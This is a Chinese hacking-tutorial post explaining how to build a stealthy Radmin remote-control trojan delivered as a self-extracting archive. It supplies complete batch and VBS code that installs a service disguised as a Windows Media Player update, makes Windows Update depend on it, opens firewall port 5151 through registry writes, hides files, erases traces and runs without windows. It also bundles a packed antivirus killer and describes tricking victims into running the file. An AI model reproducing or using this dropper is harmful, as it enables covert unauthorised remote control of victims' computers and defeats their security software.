大家好,关于如何打造出完美的Radmin服务端,网上有很多类似的修改后的程序,但有的服务名会暴露,有的会显示CMD窗口,我弥补了它们的缺点,综合了它们的优点,打造出了现在这个完美的Radmin服务端。
准备工具
Rock免杀工具;
IcoSprite图标更改器;
Killer15杀杀毒
软件防火墙工具;
SC.exe服务添加删除更改工具;
AdmDll.dll、Raddrv.dll、R_server(这个不用说了吧,Radmin的服务端)。
程序特点
自解压形式,双击即可,自动解压到%systemroot%\system32\drivers\目录下,并能干掉卡巴斯基等杀毒
软件。使用vbs嵌套bat来执行所有内容,不会跳出任何窗口。自建服务,并修改服务名、显示名、描述使其做到隐蔽。依存
Windows Update服务,给试图关闭它带来困惑。做完一切后以只读,隐藏形式隐蔽Radmin服务端的三个程序,删除掉生成的一些REG、BAT、VBS文件,并能够突破Radmin外部连接进来时XP SP2
防火墙的拦截。
制作过程
首先自己安装一下Radmin服务端,配置完密码,端口等信息后导出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件,这里我另存为名Server.reg。然后要修改R_server.exe的图标并修改文件名为迷惑性文字如Update.exe,修改图标我用IcoSprite,觉得还不错。这样假如对方装有天网之类
防火墙的话,可以骗过一些菜鸟,同意允许对外连接。
接下来我们制作核心部分,最关键的BAT,重要的我将简单解释:
@echo off
@sc stop r_server
‘假如已经被装过R_server服务,先用SC将它停掉。
@sc delete r_server
‘将已经装过R_server服务删除。
@regedit /s server.reg
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= own type= interact start= auto DisplayName= "Media Player of Remote
Control Driver Update"
‘这句是用SC建立一个服务,服务名为Mpservice,路径Binpath为"%systemroot%\system32\drivers\Update.exe /service",类型type为 own 与interact交互,启动类型start为 自动,显示名DisplayName为"Media Player of Remote Control Driver Update"。
@sc description MPservice "为
Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。"
‘这句是将MPservice服务的描述改为“为
Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。”
@sc config wuauserv depend= MPservice
‘配置MPservice使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在
Windows Update 网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的Radmin服务。
@echo
Windows Registry Editor Version 5.00 > %systemroot%\system32\drivers\DisFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg
‘这里添加成的一个DisFirewall.reg注册表文件,在对方是XP SP2系统的情况下将起到很大重要,由于SP2自带的
防火墙配置信息是存放于注册表中的,所有完全可以通过写入自己想要的信息使你的R_server可以接受外界的连接。
@echo "5151:TCP"="5151:TCP:*:Enabled:
Windows Update Services">> stemroot%\system32\drivers\DisFirewall.reg
‘这句是允许外部连接5151的TCP端口,设置
防火墙此规则名为
Windows Update Services。
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg
@attrib +h +r %systemroot%\system32\drivers\Update.exe
@attrib +h +r %systemroot%\system32\drivers\admdll.dll
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll
‘以上三句是设置服务端三个文件为隐藏、只读属性。
@sc start MPservice
@del /q /f /s %systemroot%\system32\drivers\server.reg
@del /q /f /s %systemroot%\system32\drivers\Update.vbs
@del /q /f /s %systemroot%\system32\drivers\Update.bat
@del /q /f /s %systemroot%\system32\drivers\sc.exe
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg
‘以上是清理生成出来的杂物,加参数/q是以安静模式删除,不要求确认,参数/f是强制删除只读文件,参数/s是从所有子目录删除指定文件。
接下来制作一个vbs文件,作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。里面写上如下代码:
On Error Resume Next
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("Update.bat",0)
最后出场的是Killer15.exe这个东东,按它的说明书说是可以杀Norton AntiVirus、McAfee、个人计算机Cillin&KAV等。我用我的卡巴2006测试过,确实能被它杀掉。由于直接运行的话还没执行就被杀毒
软件给干掉了,所以给它加个壳,这里用Rock免杀工具,经过它加的壳后逃过了我卡巴的大关,格式是:usage: rock [filename]。
好了,整理一下:三个服务端文件+一个注册表信息,一个BAT,一个VBS,一个SC,一个Killer15,一共是8个文件,将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”,到高级里打开“自解压选项”,“解压路径”为%systemroot%\system32\drivers\,解压后运行“Update.vbs”,解压前运行“Killer15.new.exe”,模式里选“全部隐藏”跟“跳过已经存在文件”,文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的ico图标做为自解压最后生成的图标。OK,一个自解压形式的Radmin服务端就这样生成了。假如你是靠欺骗别人双击执行的,你还可以自己添加个小游戏之类的进去,令它双击自解压的同时不会什么反映都没有,这里我就不再阐述了。
最后感谢很多朋友对我的帮助,对于最后的服务端,假如大家有什么好的建议还请到黑防论坛赐教。
设为首页
加入收藏
联系我们
您当前的位置:
减小字体
增大字体
